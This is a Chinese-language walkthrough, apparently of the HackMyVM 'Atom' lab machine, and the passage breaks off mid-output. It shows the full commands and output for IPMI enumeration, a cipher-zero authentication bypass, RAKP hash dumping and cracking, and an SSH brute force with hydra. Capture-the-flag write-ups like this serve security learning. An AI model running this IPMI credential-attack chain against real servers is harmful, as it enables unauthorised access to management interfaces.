{"id":763,"date":"2024-07-19T02:24:15","date_gmt":"2024-07-18T18:24:15","guid":{"rendered":"http:\/\/162.14.82.114\/?p=763"},"modified":"2024-07-19T02:24:15","modified_gmt":"2024-07-18T18:24:15","slug":"hmv-_-atom","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/763\/07\/19\/2024\/","title":{"rendered":"hmv[-_-]Atom"},"content":{"rendered":"<h1>Atom<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221981.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221981.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240718232244203\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221983.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221983.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240718232646601\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u8ba9\u6211\u8054\u60f3\u5230\u4e86\u524d\u4e0d\u4e45\u7206\u7684\u90a3\u4e2a\u65b0\u6f0f\u6d1e\uff0c\u4f46\u662f\u597d\u50cf\u4e0d\u597d\u5229\u7528\uff0c\u770b\u7fa4\u53cb\u4e5f\u6ca1\u6709\u5229\u7528\u6210\u529f\uff0c\u5148\u6401\u7f6e\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>UDP\u626b\u63cf<\/h3>\n<p>\u770b\u4e0d\u5230\u522b\u7684\u5229\u7528\u70b9\uff0c\u5c1d\u8bd5UDP\u626b\u63cf\u4e00\u4e0b\uff0c\u4e3a\u4e86\u7701\u65f6\u95f4\u4ec5\u626b\u63cf\u524d\u4e00\u4e07\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU $IP -p-                 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:30 EDT\nStats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 0.32% done\nStats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 0.56% done<\/code><\/pre>\n<p>\u53d1\u73b0\u626b\u63cf\u901f\u5ea6\u8fc7\u6162\u4e86\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u6362\u4e00\u4e0b\u53c2\u6570\uff0c\u7b5b\u9009\u6700\u5e38\u7528\u7684100\u4e2a\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 $IP\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:41 EDT\nStats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 32.17% done; ETC: 11:42 (0:00:21 remaining)\nNmap scan report for 172.20.10.3\nHost is up (0.00079s latency).\nNot shown: 61 open|filtered udp ports (no-response), 38 closed udp ports (port-unreach)\nPORT    STATE SERVICE  VERSION\n623\/udp open  asf-rmcp\nMAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 43.55 seconds<\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-sU<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9 <code>nmap<\/code> \u4ec5\u626b\u63cf UDP \u7aef\u53e3\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c<code>nmap<\/code> \u4f1a\u540c\u65f6\u626b\u63cf TCP \u548c UDP \u7aef\u53e3\uff0c\u4f46\u5982\u679c\u4f60\u53ea\u5bf9 UDP \u7aef\u53e3\u611f\u5174\u8da3\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\u3002<\/li>\n<li><code>-sV<\/code>: \u8fd9\u4e2a\u9009\u9879\u4f7f <code>nmap<\/code> \u5c1d\u8bd5\u786e\u5b9a\u76ee\u6807\u673a\u5668\u4e0a\u5f00\u653e\u7aef\u53e3\u7684\u670d\u52a1\u7248\u672c\u4fe1\u606f\u3002\u8fd9\u901a\u8fc7\u5411\u7aef\u53e3\u53d1\u9001\u4e00\u7cfb\u5217\u63a2\u6d4b\u5305\u5e76\u89e3\u6790\u54cd\u5e94\u6765\u5b9e\u73b0\u3002<\/li>\n<li><code>--version-intensity 0<\/code>: \u8fd9\u4e2a\u9009\u9879\u7528\u4e8e\u8c03\u6574\u7248\u672c\u68c0\u6d4b\u7684\u5f3a\u5ea6\u3002\u5f3a\u5ea6\u503c\u4ece 0 \u5230 9\uff0c\u5176\u4e2d 0 \u8868\u793a\u975e\u5e38\u8f7b\u91cf\u7ea7\u7684\u68c0\u6d4b\uff08\u4ec5\u53d1\u9001\u4e00\u4e9b\u57fa\u672c\u7684\u63a2\u6d4b\u5305\uff09\uff0c\u800c 9 \u8868\u793a\u6700\u5f7b\u5e95\u7684\u68c0\u6d4b\uff08\u53ef\u80fd\u4f1a\u53d1\u9001\u5927\u91cf\u7684\u63a2\u6d4b\u5305\uff0c\u4f46\u53ef\u80fd\u4f1a\u82b1\u8d39\u66f4\u591a\u65f6\u95f4\u5e76\u66b4\u9732\u66f4\u591a\u7684\u626b\u63cf\u6d3b\u52a8\uff09\u3002<\/li>\n<li><code>-n<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9 <code>nmap<\/code> \u5728\u8fdb\u884c\u626b\u63cf\u65f6\u4e0d\u8981\u8fdb\u884c DNS \u89e3\u6790\u3002\u8fd9\u53ef\u4ee5\u52a0\u5feb\u626b\u63cf\u901f\u5ea6\uff0c\u7279\u522b\u662f\u5728\u626b\u63cf\u5927\u91cf IP \u5730\u5740\u65f6\uff0c\u56e0\u4e3a DNS \u89e3\u6790\u53ef\u80fd\u4f1a\u6210\u4e3a\u74f6\u9888\u3002<\/li>\n<li><code>-F<\/code>: \u8fd9\u4e2a\u9009\u9879\u662f <code>--fast<\/code> \u7684\u7b80\u5199\uff0c\u5b83\u4f7f <code>nmap<\/code> \u66f4\u5feb\u5730\u8fdb\u884c\u626b\u63cf\u3002\u5b83\u4f1a\u51cf\u5c11\u626b\u63cf\u7684\u7aef\u53e3\u6570\u91cf\uff08\u53ea\u626b\u63cf\u6700\u5e38\u89c1\u7684 100 \u4e2a\u7aef\u53e3\uff09\uff0c\u5e76\u53ef\u80fd\u51cf\u5c11\u626b\u63cf\u65f6\u95f4\u6216\u53d1\u9001\u7684\u63a2\u6d4b\u5305\u6570\u91cf\u3002\u8fd9\u5bf9\u4e8e\u5feb\u901f\u83b7\u53d6\u76ee\u6807\u7cfb\u7edf\u7684\u57fa\u672c\u4fe1\u606f\u5f88\u6709\u7528\u3002<\/li>\n<li><code>-T4<\/code>: \u8fd9\u4e2a\u9009\u9879\u7528\u4e8e\u8bbe\u7f6e\u626b\u63cf\u7684\u65f6\u95f4\u6a21\u677f\u3002<code>nmap<\/code> \u63d0\u4f9b\u4e86\u51e0\u79cd\u4e0d\u540c\u7684\u65f6\u95f4\u6a21\u677f\uff08\u4ece 0 \u5230 5\uff09\uff0c\u5176\u4e2d 0 \u662f\u6700\u6162\u7684\uff08\u6700\u9690\u853d\u7684\uff09\uff0c\u800c 5 \u662f\u6700\u5feb\u7684\uff08\u4f46\u53ef\u80fd\u66f4\u5bb9\u6613\u88ab\u68c0\u6d4b\u5230\uff09\u3002<code>-T4<\/code> \u662f\u4e00\u4e2a\u4e2d\u7b49\u901f\u5ea6\u7684\u8bbe\u7f6e\uff0c\u5b83\u5728\u626b\u63cf\u901f\u5ea6\u548c\u9690\u853d\u6027\u4e4b\u95f4\u505a\u4e86\u4e00\u4e2a\u6298\u4e2d\u3002<\/li>\n<\/ul>\n<\/blockquote>\n<p>\u901f\u5ea6\u5feb\u7684\u96c5\u75de\uff0cnice\uff01\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\u662f\u4e2a\u795e\u9b54\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/623-udp-ipmi\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/623-udp-ipmi<\/a><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<h3>ipmi\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU --script ipmi-version -p 623 $IP   \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:48 EDT\nNmap scan report for 172.20.10.3\nHost is up (0.00084s latency).\n\nPORT    STATE SERVICE\n623\/udp open  asf-rmcp\n| ipmi-version: \n|   Version: \n|     IPMI-2.0\n|   UserAuth: password, md5, md2, null\n|   PassAuth: auth_msg, auth_user, non_null_user\n|_  Level: 1.5, 2.0\nMAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.33 seconds<\/code><\/pre>\n<p>\u626b\u63cf\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u8eab\u4efd\u8ba4\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use auxiliary\/scanner\/ipmi\/ipmi_version\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_version):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   BATCHSIZE  256              yes       The number of hosts to probe in each set\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      623              yes       The target port (UDP)\n   THREADS    10               yes       The number of concurrent threads\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; set RHOSTS 172.20.10.3\nRHOSTS =&gt; 172.20.10.3\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; run\n\n[*] Sending IPMI requests to 172.20.10.3-&gt;172.20.10.3 (1 hosts)\n[+] 172.20.10.3:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) \n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; use auxiliary\/scanner\/ipmi\/ipmi_cipher_zero\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_cipher_zero):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   BATCHSIZE  256              yes       The number of hosts to probe in each set\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      623              yes       The target port (UDP)\n   THREADS    10               yes       The number of concurrent threads\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; run\n\n[*] Sending IPMI requests to 172.20.10.3-&gt;172.20.10.3 (1 hosts)\n[+] 172.20.10.3:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p>\u5b58\u5728\u5e76\u53ef\u4ee5\u8fdb\u884c\u5229\u7528,\u5c1d\u8bd5\u4f7f\u7528\u5de5\u5177\u8fdb\u884c\u5229\u7528\uff1a<code>apt-get install ipmitool<\/code>\uff0c\u4f46\u662f\u8981\u5148\u627e\u5230\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ msfconsole -q                                   \nmsf6 &gt; use auxiliary\/scanner\/ipmi\/ipmi_dumphashes\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_dumphashes):\n\n   Name                  Current Setting                                    Required  Description\n   ----                  ---------------                                    --------  -----------\n   CRACK_COMMON          true                                               yes       Automatically crack common passwords as they are obtained\n   OUTPUT_HASHCAT_FILE                                                      no        Save captured password hashes in hashcat format\n   OUTPUT_JOHN_FILE                                                         no        Save captured password hashes in john the ripper format\n   PASS_FILE             \/usr\/share\/metasploit-framework\/data\/wordlists\/ip  yes       File containing common passwords for offline cracking, one per line\n                         mi_passwords.txt\n   RHOSTS                                                                   yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-meta\n                                                                                      sploit.html\n   RPORT                 623                                                yes       The target port\n   SESSION_MAX_ATTEMPTS  5                                                  yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)\n   SESSION_RETRY_DELAY   5                                                  yes       Delay between session retries in seconds\n   THREADS               1                                                  yes       The number of concurrent threads (max one per host)\n   USER_FILE             \/usr\/share\/metasploit-framework\/data\/wordlists\/ip  yes       File containing usernames, one per line\n                         mi_users.txt\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; run\n\n[+] 172.20.10.3:623 - IPMI - Hash found: admin:a111f95082010000092609dfb9d7bddaf155a7ca936647a94a430a7cc46c896ed9721d01c8b36230a123456789abcdefa123456789abcdef140561646d696e:f086884e16c2ea6ffc95d9163d380fc94ead10c0\n[+] 172.20.10.3:623 - IPMI - Hash for user &#039;admin&#039; matches password &#039;cukorborso&#039;\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221984.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221984.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719001248673\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u627e\u4e0d\u5230\u5176\u4ed6\u7684\u7528\u6237\u5bc6\u7801\u3002\u3002\u3002<code>\u653e\u56fe\u662f\u56e0\u4e3a\u56fe\u597d\u770b\u6709\u989c\u8272.jpg<\/code>\uff0c\u5c1d\u8bd5\u7ed5\u8fc7 IPMI \u8eab\u4efd\u9a8c\u8bc1\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list\nID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit\n1                    true    false      false      Unknown (0x00)\n2   admin            true    false      true       ADMINISTRATOR\n3   analiese         true    false      true       USER\n4   briella          true    false      true       USER\n5   richardson       true    false      true       USER\n6   carsten          true    false      true       USER\n7   sibylle          true    false      true       USER\n8   wai-ching        true    false      true       USER\n9   jerrilee         true    false      true       USER\n10  glynn            true    false      true       USER\n11  asia             true    false      true       USER\n12  zaylen           true    false      true       USER\n13  fabien           true    false      true       USER\n14  merola           true    false      true       USER\n15  jem              true    false      true       USER\n16  riyaz            true    false      true       USER\n17  laten            true    false      true       USER\n18  cati             true    false      true       USER\n19  rozalia          true    false      true       USER\n20  palmer           true    false      true       USER\n21  onida            true    false      true       USER\n22  terra            true    false      true       USER\n23  ranga            true    false      true       USER\n24  harrie           true    false      true       USER\n25  pauly            true    false      true       USER\n26  els              true    false      true       USER\n27  bqb              true    false      true       USER\n28  karlotte         true    false      true       USER\n29  zali             true    false      true       USER\n30  ende             true    false      true       USER\n31  stacey           true    false      true       USER\n32  shirin           true    false      true       USER\n33  kaki             true    false      true       USER\n34  saman            true    false      true       USER\n35  kalie            true    false      true       USER\n36  deshawn          true    false      true       USER\n37  mayeul           true    false      true       USER\n38                   true    false      false      Unknown (0x00)\n39                   true    false      false      Unknown (0x00)\n40                   true    false      false      Unknown (0x00)\n41                   true    false      false      Unknown (0x00)\n42                   true    false      false      Unknown (0x00)\n43                   true    false      false      Unknown (0x00)\n44                   true    false      false      Unknown (0x00)\n45                   true    false      false      Unknown (0x00)\n46                   true    false      false      Unknown (0x00)\n47                   true    false      false      Unknown (0x00)\n48                   true    false      false      Unknown (0x00)\n49                   true    false      false      Unknown (0x00)\n50                   true    false      false      Unknown (0x00)\n51                   true    false      false      Unknown (0x00)\n52                   true    false      false      Unknown (0x00)\n53                   true    false      false      Unknown (0x00)\n54                   true    false      false      Unknown (0x00)\n55                   true    false      false      Unknown (0x00)\n56                   true    false      false      Unknown (0x00)\n57                   true    false      false      Unknown (0x00)\n58                   true    false      false      Unknown (0x00)\n59                   true    false      false      Unknown (0x00)\n60                   true    false      false      Unknown (0x00)\n61                   true    false      false      Unknown (0x00)\n62                   true    false      false      Unknown (0x00)\n63                   true    false      false      Unknown (0x00)<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u67e5\u627e\u5229\u7528<\/h3>\n<p>\u5c1d\u8bd5ssh\u8fde\u63a5\u4f46\u662f\u5931\u8d25\uff0c\u5c1d\u8bd5\u5229\u7528\u73b0\u6709\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221985.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221985.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719003457512\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u4f7f\u7528\u65b9\u6cd5\u6709\u95ee\u9898\u90fd\u6ca1\u6210\u529f\uff0c\u5c1d\u8bd5\u641c\u7d22\uff0c\u627e\u5230\u4e86\u4e00\u4e2a\u65b0\u7684\u641c\u7d22\u5de5\u5177\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221986.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221986.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719004936867\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e5f\u662fdumphash\u7684\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list | grep USER | awk -F &#039;[ ]&#039; &#039;{print $3}&#039; | uniq -u \nglynn\nasia\nzaylen\nfabien\nmerola\njem\nriyaz\nlaten\ncati\nrozalia\npalmer\nonida\nterra\nranga\nharrie\npauly\nels\nbqb\nkarlotte\nzali\nende\nstacey\nshirin\nkaki\nsaman\nkalie\ndeshawn\nmayeul<\/code><\/pre>\n<p>\u5bfc\u5165\u6587\u4ef6\u8fdb\u884c\u5206\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\"># git clone https:\/\/github.com\/c0rnf13ld\/ipmiPwner.git\n# ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list | grep USER | awk -F &#039;[ ]&#039; &#039;{print $3}&#039; | uniq -u &gt; user\n# cd ipmiPwner\n# sudo .\/requirements.sh\n# \u968f\u4fbf\u5c1d\u8bd5\u4e00\u4e2a\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ sudo python3 ipmipwner.py --host 172.20.10.3 -u glynn -c john -pW \/usr\/share\/wordlists\/rockyou.txt -oH hash\n[*] Checking if port 623 for host 172.20.10.3 is active\n[*] The username: glynn is valid                                                  \n[*] Saving hash for user: glynn in file: &quot;hash&quot;\n[*] The hash for user: glynn\n   \\_ $rakp$a4a3a2a08209000027bf9c61b838a56a9973b3df9ebf3d62123c97e7c875a1e96c914427d59d6e4aa123456789abcdefa123456789abcdef1405676c796e6e$003cce9e8c3767318b61fc6f893afd5efd3aaded[*] Starting the hash cracking with john\n\nUsing default input encoding: UTF-8\nLoaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress Ctrl-C to abort, or send SIGUSR1 to john process for status\nevan             (172.20.10.3 glynn)     \n1g 0:00:00:00 DONE (2024-07-18 13:12) 2.564g\/s 168041p\/s 168041c\/s 168041C\/s dyesebel..sabrina7\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ for user in $(cat ..\/user); do sudo python3 ipmipwner.py --host 172.20.10.3 -u $user -c john -pW \/usr\/share\/wordlists\/rockyou.txt -oH hash &gt;&gt; pass; done\n........\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ cat pass | grep &#039;(172&#039; | awk &#039;{print $1}&#039;          \nevan\nTWEETY1\n120691\nchatroom\nmackenzie2\n081704\ndjones\ntrick1\n122987\nbatman!\nphones\njiggaman\nsexymoma\njaffa1\n071590\n515253\ndezzy\n290992\nemeralds\npoynter\ntripod\ncastillo1\nkittyboo\nnumberone\n090506\nbillandben\nmilo123\n241107\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ cat pass | grep &#039;(172&#039; | awk &#039;{print $1}&#039; &gt; ..\/pazz<\/code><\/pre>\n<h3>\u7206\u7834<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ hydra -L user -P pazz ssh:\/\/172.20.10.3                                                                                          \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-18 13:47:20\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28\/p:28), ~49 tries per task\n[DATA] attacking ssh:\/\/172.20.10.3:22\/\n[STATUS] 304.00 tries\/min, 304 tries in 00:01h, 482 to do in 00:02h, 14 active\n[22][ssh] host: 172.20.10.3   login: onida   password: 